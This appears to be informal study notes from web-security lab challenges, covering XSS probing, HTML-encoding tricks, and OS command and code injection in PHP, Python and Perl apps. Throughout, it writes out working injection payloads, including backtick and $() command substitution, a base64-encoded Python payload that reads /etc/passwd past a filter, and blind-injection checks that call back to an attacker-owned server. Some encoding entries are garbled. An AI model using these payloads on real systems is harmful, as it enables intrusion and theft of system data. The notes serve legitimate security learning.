---------------------------------------------------------------------------------------
                                  XSS tricks
---------------------------------------------------------------------------------------
Pick a payload : 123'"<t>
Inject the payload
see how it gets reflected in pages
Iterate on the payload to execute JavaScript
Search and page and check if your script broke the html code
Dont fuzz blindly but check the context in which your payload is echoed back in the page
----------------------------------------------------------------------------------------
HTML encoding bypass : 
Named : < &lt;  | > &ht; 
Hex : <  0x3ce ---> &#x3e; | " 0x22 ---> &#x22; | & 0x26 ---> &#x26;
Decimal : ' decimal value 39 ---> &#39; | < 60 ---> &#60
How does  encoding impact Xss
----------------------------------------------------------------------------------------
                        Code execution PHP web app [0]
----------------------------------------------------------------------------------------
Command injection can be used to run arbitrary commands on a server.

Multiple payloads can be used to trigger this behaviour. For example, let’s say that the initial command is:

ping [parameter]
Where [parameter] is the value you provided in the form or in the URL.

If you look at how the command line works, you will find that there are multiple ways to add more commands:

command1 && command2 that will run command2 if command1 succeeds.
command1 || command2 that will run command2 if command1 fails.
command1 ; command2 that will run command1 then command2.
command1 | command2 that will run command1 and send the output of command1 to command2.
----------------------------------------------------------------------------------------
                        Code execution PHP web app [1]
----------------------------------------------------------------------------------------
In this case the developer fixed the issue from the previous one and has started filtering on some special characters.
However, the developer forgot that you can use `command` to run a command.
So when we inject somthing like ?ip=`id` we got this output : ping -c 2 `id` no errors and our command is printed back, it may sems like its not executed but who nows maybe its a blind injection so to make sure if it executed or not, we can inject a revers shell and check if we can get a reverse connection to our machine
----------------------------------------------------------------------------------------
                        Code execution PHP web app [2]
----------------------------------------------------------------------------------------
In this challenge, the developer fixed the previous issue and is now filtering on even more special characters.
However, the developer forgot that you can use $(command) to run a command.
So our bypass will be like this :
?ip=127.0.0.1$(cmand) as the privious challenge we have no output to check if the cmd has been executed or not so we may go blind, but thers some cool tricks to check if the cms is executed or not
1/ using the sleep command and compare time of responding $(sleep 10) so we should wait 10 second before getting the page.
2/ ping an exernal host that we own and check the logs
3/ curl  to read or download a file from our own server and check the logs
----------------------------------------------------------------------------------------
                        Code execution Paython web app: 1 [Easy]
----------------------------------------------------------------------------------------
Even if the path is like this Target/hello/hacker
try to add " or ' at the end of its cause its maybe taking parametters, if you got an error,
try to craft a payload that bypass this error then develop your exploit
somme times you will have RCE but your payload wont work for example
os.system('id') this may be beacuse the module os is not imported, so one thing we can do 
__import__('os').system('id') this may not work for many reasons so we need to play with the payload so it match our entry case we can use somthing like this "%2bstr(__import__('os').popen('id').read())%2b"
-----------------------------------------------------------------------------------------
                        Code execution Paython web app: 2 [Meduim]
-----------------------------------------------------------------------------------------
In other cases the first payload may not work because of some kind of restrinction maybe a waf, so we need to try encoding somthing like this "%2bstr(__import__('os').popen('"cat%20%252FEtc%252FPasswd').read())%2b"
Here we werent able to execute or normal "cat /etc/passwd" and by playing with the payload we understood that the "/" is the character that cause the error, so by urlencoding it we bypassed the error but with no result!
so lets try somthing else Base64 for example :
Command
base64encode(command) -> payload
exec (base64encode(payload))
import base65; b64decode(...)
__import__('base64').b64decode('Y2F0IC9ldGMvcGFzc3dkCg==')
" + str(__import__('os').popen(__import__('base64').b64decode('Y2F0IC9ldGMvcGFzc3dkCg==')).read()) +"
-------------------------------------------------------------------------------------------
                        Code injection in Perl: [0]
-------------------------------------------------------------------------------------------
So in this application we have an endpoit like this :
http://Target/#hacker and by itercepting request using developer tool we can see that a page with this parametres load /cgi-bin/hello?name=hacker so if we go to it we will get json result :
{"str":"Hello hacker"}
so lets try to play with this page!
1] http://Target/cgi-bin/hello?name=hacker ---> {"str":"Hello hacker"}
2] http://Target/cgi-bin/hello?name=hacker" ---> {"str":"Hello hacker""}
3] http://Target/cgi-bin/hello?name=hacker' ---> {"str":""} interesting!
4] http://Target/cgi-bin/hello?name=hacker'' ---> {"str":""} interesting!
So we know that '' can be used give us an empty string so what if we concatanat it with somthing like id
5] http://Target/cgi-bin/hello?name=hacker'.id.' ---> {"str":""} Notworking id is just printed!
What about using backtiks to make try making id command executable
6] http://Target/cgi-bin/hello?name=hacker'.`id`.' ---> {"str":"Hello hackeruid=33(www-data) gid=33(www-data) groups=33(www-data) [Voilla]
---------------------------------------------------------------------------------------------
